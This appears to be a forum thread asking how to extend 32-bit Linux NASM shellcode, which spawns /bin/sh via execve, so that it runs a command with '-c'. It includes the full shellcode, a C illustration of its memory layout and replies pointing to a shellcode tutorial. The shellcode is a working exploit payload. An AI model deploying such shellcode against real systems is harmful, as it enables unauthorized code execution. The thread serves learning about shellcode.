Shellcode that spawns a shell with added arguments

Problem description:

I have some basic shellcode:

```nasm
BITS 32

jmp short  callit       ; jmp trick as explained above

doit:
pop    esi              ; esi now represents the location of our string
xor    eax, eax         ; make eax 0
mov byte  [esi + 7], al ; terminate /bin/sh
lea    ebx, [esi]       ; get the address of /bin/sh and put it in register ebx
mov long  [esi + 8], ebx  ; put the value of ebx (the address of /bin/sh) in AAAA ([esi + 8])
mov long  [esi + 12], eax ; put NULL in BBBB (remember xor eax, eax)
mov byte  al, 0x0b      ; Execution time! we use syscall 0x0b which represents execve
mov    ebx, esi         ; argument one... ratatata /bin/sh
lea    ecx, [esi + 8]   ; argument two... ratatata our pointer to /bin/sh
lea    edx, [esi + 12]  ; argument three... ratataa our pointer to NULL
int    0x80

callit:
call   doit             ; part of the jmp trick to get the location of db

db    '/bin/sh#AAAABBBB'
```

But let's say I want to add some commands as arguments to the shell. So, for example, to create a new file I would do something like /bin/sh -c 'touch "filepath"', but I'm a bit stuck on how I would change my shellcode to do that.

Thanks, 西巴

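To see what the shellcode's `[esi + 7]`, `[esi + 8]` and `[esi + 12]` stores are actually building, here is the same data layout written in plain C. This is an added illustration, not the poster's code or anything from the linked tutorial; the `struct blob`, `init_blob`, `prepare_blob` and `build_argv` names are invented for it, and the pointer slots are `sizeof(char *)` wide rather than the fixed 4 bytes of the 32-bit original so it also compiles on a 64-bit host. It also states the general rule behind the question: execve's `argv` needs one pointer per argument plus a trailing NULL, so extending the argument list means widening the pointer area, not just the string.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>

/* The shellcode's data blob rebuilt as a C struct (constructed here to
   illustrate the layout, not the page's own bytes): the path with a '#'
   placeholder where the NUL must go, followed by two pointer-sized slots
   standing in for AAAA (argv[0]) and BBBB (the NULL terminator).
   In the 32-bit shellcode the slots sit at offsets 8 and 12; here they
   are sizeof(char *) wide so the same idea works on a 64-bit host too. */
struct blob {
    char  path[8];      /* "/bin/sh" + one placeholder byte */
    char *argv[2];      /* AAAA, BBBB */
};

/* Put the blob in the state the 'db' line produces: path not yet
   terminated, pointer slots still filler. */
void init_blob(struct blob *b)
{
    memcpy(b->path, "/bin/sh#", 8);
    b->argv[0] = NULL;
    b->argv[1] = NULL;
}

/* Does in C what the assembly does at [esi+7], [esi+8] and [esi+12]:
   terminate the path, store its address as argv[0], store NULL as argv[1].
   Returns the argv array execve would take, or NULL if the blob is not in
   the expected initial state (e.g. already prepared once). */
char **prepare_blob(struct blob *b)
{
    if (memcmp(b->path, "/bin/sh#", 8) != 0)
        return NULL;
    b->path[7] = '\0';          /* mov byte [esi+7], al   (al == 0)   */
    b->argv[0] = b->path;       /* mov long [esi+8], ebx  (ebx == esi) */
    b->argv[1] = NULL;          /* mov long [esi+12], eax (eax == 0)  */
    return b->argv;
}

/* The general rule: n arguments need n + 1 pointer slots because the
   kernel stops at the first NULL. Copies the pointers into argv and
   returns n, or -1 when there is no room for the terminator, which is
   the mistake made when the string is extended but the pointer area is not. */
int build_argv(char *argv[], size_t slots, const char *const args[], size_t n)
{
    if (slots < n + 1)
        return -1;
    for (size_t i = 0; i < n; i++)
        argv[i] = (char *)args[i];
    argv[n] = NULL;
    return (int)n;
}

int main(void)
{
    struct blob b;
    init_blob(&b);
    char **argv = prepare_blob(&b);
    if (argv)
        printf("argv[0]=%s argv[1]=%p\n", argv[0], (void *)argv[1]);

    /* Three arguments, as in the question's goal, so four slots are needed. */
    const char *const args[] = { "/bin/sh", "-c", "touch filepath" };
    char *argv2[4];
    int n = build_argv(argv2, 4, args, 3);
    printf("built %d arguments, terminator at argv[%d]\n", n, n);
    return 0;
}
```

Nothing here calls execve; the point is only the memory layout. Compare the struct offsets with the `[esi + ...]` operands in the shellcode, and note that `prepare_blob` refuses to run twice, because once the '#' has been overwritten the blob no longer matches what the code expects.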

Learn assembly first before you start writing shellcode? – DipSwitch

This comes from the tutorial http://www.safemode.org/files/zillion/shellcode/doc/Writing_shellcode.html; what you are asking about is in the section "The execve example number III (2 > arguments, linux)":


btw, pushing the string onto the stack is easier than the jmp/call/pop trick :p – DipSwitch